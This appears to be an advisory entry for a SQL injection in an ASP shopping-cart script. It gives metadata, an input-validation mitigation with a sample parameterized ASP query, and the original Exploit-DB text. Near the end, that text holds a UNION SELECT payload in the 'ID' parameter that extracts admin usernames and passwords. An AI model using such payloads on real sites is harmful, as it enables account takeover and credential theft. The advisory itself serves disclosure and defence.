Vendor: Shopping Mall
By: Osmanizim
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Shopping Mall
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Shopping Mall <= SQL Injection Vulnerability

A SQL injection vulnerability exists in Shopping Mall, which allows an attacker to execute arbitrary SQL commands via the 'ID' parameter in 'shpdetails.asp' and gain access to the admin panel via 'admlogin.asp'.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
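
One way to apply this mitigation to a page such as 'shpdetails.asp', shown as an added classic ASP example that is not the product's own code. The `products` table, its column names and the `ShopConnString` application setting are assumptions; the page validates `ID` as an integer and then passes it as a bound parameter.

```asp
<%
Option Explicit
' Added example, not Shopping Mall source code. The "products" table, its
' columns and the connection string setting are assumptions for illustration.
Const adInteger = 3, adParamInput = 1, adCmdText = 1

' Vulnerable pattern (kept as a comment): the query string value is pasted
' into the SQL text, so anything after the number becomes part of the statement.
'   sql = "SELECT * FROM products WHERE ID=" & Request.QueryString("ID")

' Return True only for 1-9 ASCII digits, which always fits a 32-bit integer.
Function IsPositiveInt(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsPositiveInt = re.Test(s)
End Function

Dim rawId, conn, cmd, rs
rawId = Trim(Request.QueryString("ID"))

' Input validation: reject anything that is not a plain integer.
If Not IsPositiveInt(rawId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ShopConnString")   ' hypothetical setting name

' Parameterized query: the ID travels as typed data, never as SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT ID, Name, Price FROM products WHERE ID = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , CLng(rawId))

Set rs = cmd.Execute
If rs.EOF Then
    Response.Status = "404 Not Found"
Else
    Response.Write Server.HTMLEncode(rs("Name") & "")
End If
rs.Close : conn.Close
%>
```

With both checks in place, a request whose `ID` carries anything other than digits is rejected before a database connection is opened, and a numeric `ID` can only ever be compared against the `ID` column.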

Exploit-DB raw data:

#By Osmanizim 
#Security Specialist
#Contacts > :(  www.osmanizim.com
#Title: Shopping Mall <=  SQL Injection Vulnerability.
#Demo : http://freeasp.sepcity.com/shopmall/default.asp



//  Exploit -->


http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators




// Admin -->


http://localhost/shopmall/admlogin.asp?

# milw0rm.com [2008-12-29]